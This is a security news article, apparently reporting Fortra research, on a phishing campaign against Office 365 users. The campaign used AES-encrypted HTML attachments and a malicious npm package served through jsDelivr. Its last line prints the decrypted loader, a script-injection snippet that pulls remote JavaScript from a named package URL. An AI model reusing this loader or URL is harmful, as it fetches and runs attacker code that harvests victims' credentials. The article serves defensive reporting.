A sophisticated phishing campaign targeting Microsoft Office 365 users has emerged, combining several advanced techniques to evade detection and harvest credentials.
The attack, identified in early April 2025, leverages encrypted HTML files, content delivery networks (CDNs), and malicious npm packages in a multi-stage approach that cybersecurity experts describe as unusually complex for typical phishing operations.
The attack begins innocuously with an email purporting to contain financial information, specifically an “EFT-PMT.htm” file disguised as payment documentation.
Unlike conventional phishing attempts that rely on obvious redirects or suspicious attachments, this campaign employs Advanced Encryption Standard (AES) encryption to conceal its malicious payload, representing a significant evolution in threat actor methodologies.
Fortra researchers identified the attack through their Suspicious Email Analysis (SEA) team, noting that while each individual technique has been observed before, this marks the first documented instance where these particular methods have been combined to deliver a Microsoft O365 phishing attack.
The researchers emphasized that the attack demonstrates how threat actors are increasingly abusing open-source repositories to conduct sophisticated campaigns.
Upon opening the seemingly harmless HTML attachment, victims unknowingly activate a hidden script that connects to an npm package hosted on a legitimate CDN (jsDelivr), further masking the malicious activity behind trusted infrastructure.
The attack’s technical complexity and use of developer tools represents a concerning trend in phishing tactics targeting both technical and non-technical users.
Infection Mechanism Analysis
The core of this attack’s sophistication lies in its multi-layered infection mechanism. When the victim opens the HTML attachment, they activate code containing an encrypted string stored in a variable named “encryptedAthens.”
.webp)
This encryption method is particularly notable as AES is rarely employed in typical phishing campaigns, which typically rely on simpler obfuscation techniques.
When decrypted, the hidden code reveals a script insertion command: let geog = document.createElement('script');geog.type = 'text/javascript';geog.src = 'https://cdn.jsdelivr.net/npm/citiycar8@2.1.9/MOMENTUM/NOW.API.JS"; document.head.appendChild(geog);.